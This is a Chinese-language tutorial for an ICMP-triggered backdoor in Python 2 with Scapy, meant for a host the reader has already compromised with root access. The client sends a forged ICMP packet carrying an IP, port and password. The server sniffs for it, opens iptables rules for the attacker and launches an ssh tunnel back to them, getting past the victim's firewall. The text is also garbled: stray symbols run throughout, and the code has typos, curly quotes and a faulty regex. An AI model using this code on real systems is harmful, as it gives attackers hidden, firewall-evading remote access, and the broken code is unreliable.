0x00:事先說明
你已經(jīng)攻陷了對方主機(jī)且獲得了最高權(quán)限。 對方的本地防火墻會丟棄所有的外來數(shù)據(jù)包���。 這個后門不會僅綁定在某一個端口上���。 這段代碼很容易寫���,畢竟是 Python(準(zhǔn)確說是 Python 2.x)�。0x01:工作原理
如你所見��,客戶端將偽造具有 ICMP 負(fù)載的特定數(shù)據(jù)包���,另一方面在服務(wù)端�����,也就是我們的被攻擊主機(jī)�����,將會接受我們發(fā)送的數(shù)據(jù)包��,即使它開啟了本地的防火墻(丟棄所有外來數(shù)據(jù)包)。關(guān)鍵在于無線網(wǎng)卡的監(jiān)聽模式�,它無需和 AP 建立連接卻可以和接受所有流經(jīng)空氣的數(shù)據(jù)包���。
我們會用到一個有用的第三方包 Scapy����。這是它的官方文檔�����。如果你是第一次使用����,不妨參考這篇文章,也許會有幫助�����。
0x02:客戶端代碼
'''客戶端代碼���。將服務(wù)端的 IP 地址�、客戶端的 IP 地址��、客戶端的連接端口��,以及連接所需密碼作為程序輸入���。如果成功返回一個交互式后門,在代碼硬編碼好的位置寫入日志文件信息��。'''#! /usr/bin/env pythonimport loggingimport socketfrom scapy.all import *import osimport os.pathimport sysimport timelogging.getLongger("scapy.runtime").setLevel(loggin.ERROR)file_result = "/tmp/done"if len(sys.argv) != 5: print "usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + “ PASSWORD_CLIENT ” sys.exit(1)server = sys.argv[1]if os.path.isfile(file_result): os.remove(file_result)load = sys.argv[2] + "|" + sys.argv[3] + "|" + sys.argv[4]pingr = IP(dst = server) / ICMP() / loadsend(pingr, verbose = 0) # send() 函數(shù)工作在協(xié)議棧的第三層(網(wǎng)絡(luò)層)0x04:服務(wù)端代碼
服務(wù)端代碼分為兩塊:1. 主要腳本部分����、2. ssh 隧道部分����。
'''服務(wù)端代碼之主要腳本部分。這個腳本會監(jiān)聽 ICMP 數(shù)據(jù)包并從句法上分析其攜帶的數(shù)據(jù)部分(客戶端 IP 地址、客戶端連接端口�、連接所需密碼)����。接著在本地打開兩個新的防火墻規(guī)則。最后調(diào)用另一個 expect 腳本����,以建立和客戶端之間穩(wěn)定的 ssh 連接。'''#! /usr/bin/env pythonimport loggingimport socketfrom scapy.all import *import reimport subprocess # py2.4 新增模塊���,允許用戶編寫代碼生成新進(jìn)程,連接到它們的 input/output/error 管道����,并獲取它們的返回/狀態(tài)碼����。logging.getLogger("scapy.runtime").setLevel(logging.ERROR)def icmp_monitor_callback(pkt): reg = re.compile("(.*)/|(.*)/|(.*)") g = reg.match(pkt.load) if g: subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT']) subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT']) p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)]) returnsniff(prn=icmp_monitor_callback, filter="icmp", store=0) # scapy.sniff() 函數(shù)會嗅探來自空氣中的數(shù)據(jù)包�����,prn 參數(shù)用來指定回調(diào)函數(shù),每當(dāng)符合 filter 的報文被探測到時����,就會執(zhí)行回調(diào)函數(shù)。有關(guān)該函數(shù)的詳細(xì)信息�����,可以參考這篇博客:https://thepacketgeek.com/scapy-sniffing-with-custom-actions-part-1/
